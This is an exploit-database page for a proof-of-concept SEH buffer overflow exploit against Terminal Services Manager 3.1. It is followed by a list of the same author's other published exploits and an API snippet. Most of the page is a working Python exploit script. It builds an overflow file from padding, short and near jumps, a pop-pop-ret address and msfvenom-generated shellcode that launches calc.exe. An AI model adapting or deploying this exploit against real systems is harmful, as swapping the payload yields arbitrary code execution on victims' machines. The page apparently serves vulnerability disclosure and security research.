Search for hundreds of thousands of exploits

"Terminal Services Manager 3.1 - Local Buffer Overflow (SEH)"

Author

Exploit author

bzyo

Platform

Exploit platform

windows_x86

Release date

Exploit published date

2018-12-27

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
# Exploit Title: Terminal Services Manager 3.1 - Buffer Overflow (SEH)
# Date: 2018-12-25
# Exploit Author: bzyo
# Twitter: @bzyo_
# Vulnerable Software: Terminal Services Manager 3.1
# Vendor Homepage: https://lizardsystems.com
# Version: 3.1 
# Software Link: https://lizardsystems.com/download/tsmanager_setup.exe
# Tested Windows 7 SP1 x86

# Other affected software from the vendor
# Software Link: https://lizardsystems.com/download/rpexplorer_setup.exe
# Software Link: https://lizardsystems.com/download/rshutdown_setup.exe
# Software Link: https://lizardsystems.com/download/rdaudit_setup.exe

# PoC
# 1. run script
# 2. run add computers wizard
# 3. select import from files
# 4. paste tsmang.txt into computer names field
# 5. pop calc

#bad chars \x00\x0d\x0e

#!/usr/bin/python

import struct

junk2 = "A"*100
junk1 = "B"*74
jmp2 = "\xe9\x71\xfe\xff\xff\xcc"
jmp1 = "\xeb\xf8\xcc\xcc"

#0x0049709f : pop esi # pop ebx # ret  tsmanager.exe
seh = struct.pack('<L',0x0049709f)

#Payload size: 220 bytes
#msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0d\x0e" -f python
calc =  ""
calc += "\xdb\xcd\xd9\x74\x24\xf4\x5a\x2b\xc9\xbe\xbb\x1e\xdd"
calc += "\x8e\xb1\x31\x31\x72\x18\x83\xc2\x04\x03\x72\xaf\xfc"
calc += "\x28\x72\x27\x82\xd3\x8b\xb7\xe3\x5a\x6e\x86\x23\x38"
calc += "\xfa\xb8\x93\x4a\xae\x34\x5f\x1e\x5b\xcf\x2d\xb7\x6c"
calc += "\x78\x9b\xe1\x43\x79\xb0\xd2\xc2\xf9\xcb\x06\x25\xc0"
calc += "\x03\x5b\x24\x05\x79\x96\x74\xde\xf5\x05\x69\x6b\x43"
calc += "\x96\x02\x27\x45\x9e\xf7\xff\x64\x8f\xa9\x74\x3f\x0f"
calc += "\x4b\x59\x4b\x06\x53\xbe\x76\xd0\xe8\x74\x0c\xe3\x38"
calc += "\x45\xed\x48\x05\x6a\x1c\x90\x41\x4c\xff\xe7\xbb\xaf"
calc += "\x82\xff\x7f\xd2\x58\x75\x64\x74\x2a\x2d\x40\x85\xff"
calc += "\xa8\x03\x89\xb4\xbf\x4c\x8d\x4b\x13\xe7\xa9\xc0\x92"
calc += "\x28\x38\x92\xb0\xec\x61\x40\xd8\xb5\xcf\x27\xe5\xa6"
calc += "\xb0\x98\x43\xac\x5c\xcc\xf9\xef\x0a\x13\x8f\x95\x78"
calc += "\x13\x8f\x95\x2c\x7c\xbe\x1e\xa3\xfb\x3f\xf5\x80\xf4"
calc += "\x75\x54\xa0\x9c\xd3\x0c\xf1\xc0\xe3\xfa\x35\xfd\x67"
calc += "\x0f\xc5\xfa\x78\x7a\xc0\x47\x3f\x96\xb8\xd8\xaa\x98"
calc += "\x6f\xd8\xfe\xfa\xee\x4a\x62\xd3\x95\xea\x01\x2b"

buffer = junk2 + calc + junk1 + jmp2 + jmp1 + seh

with open("tsmang.txt","wb") as f:
    f.write(buffer[:-1])
Release DateTitleTypePlatformAuthor
2020-04-20"Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)"localwindowsbzyo
2019-05-17"Iperius Backup 6.1.0 - Privilege Escalation"localwindowsbzyo
2019-05-06"NSClient++ 0.5.2.35 - Privilege Escalation"localwindowsbzyo
2019-02-14"exacqVision ESM 5.12.2 - Privilege Escalation"localwindowsbzyo
2019-01-30"10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass)"localwindowsbzyo
2019-01-28"Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass)"localwindowsbzyo
2019-01-11"Code Blocks 17.12 - Local Buffer Overflow (SEH) (Unicode)"localwindowsbzyo
2019-01-10"RGui 3.5.0 - Local Buffer Overflow (SEH)(DEP Bypass)"localwindowsbzyo
2018-12-27"Iperius Backup 5.8.1 - Buffer Overflow (SEH)"localwindows_x86bzyo
2018-12-27"MAGIX Music Editor 3.1 - Buffer Overflow (SEH)"localwindows_x86bzyo
2018-12-27"Terminal Services Manager 3.1 - Local Buffer Overflow (SEH)"localwindows_x86bzyo
2018-12-20"Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)"localwindowsbzyo
2018-12-20"LanSpy 2.0.1.159 - Buffer Overflow (SEH) (Egghunter)"localwindows_x86bzyo
2018-12-11"PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion"webappsmultiplebzyo
2018-09-12"SynaMan 4.0 build 1488 - Authenticated Cross-Site Scripting (XSS)"webappswindowsbzyo
2018-09-12"SynaMan 4.0 build 1488 - SMTP Credential Disclosure"webappswindowsbzyo
2018-08-06"AgataSoft Auto PingMaster 1.5 - Buffer Overflow (SEH)"localwindowsbzyo
2018-07-23"Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)"localwindowsbzyo
2018-07-23"Splinterware System Scheduler Pro 5.12 - Privilege Escalation"localwindowsbzyo
2018-05-06"HWiNFO 5.82-3410 - Denial of Service"doswindowsbzyo
2018-04-24"RGui 3.4.4 - Local Buffer Overflow"localwindowsbzyo
2018-04-18"Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities"webappsxmlbzyo
2018-04-17"Reaper 5.78 - Local Buffer Overflow"localwindowsbzyo
2018-04-09"GoldWave 5.70 - Local Buffer Overflow (SEH Unicode)"localwindowsbzyo
2018-04-02"WebLog Expert Enterprise 9.4 - Privilege Escalation"localwindowsbzyo
2018-03-26"LabF nfsAxe 3.7 - Privilege Escalation"localwindowsbzyo
2018-03-23"WM Recorder 16.8.1 - Denial of Service"doswindowsbzyo
2018-03-05"Dup Scout Enterprise 10.5.12 - 'Share Username' Local Buffer Overflow"localwindowsbzyo
2018-03-02"IrfanView 4.44 Email Plugin - Buffer Overflow (SEH)"localwindowsbzyo
2018-03-02"IrfanView 4.50 Email Plugin - Buffer Overflow (SEH Unicode)"localwindowsbzyo
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46058/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.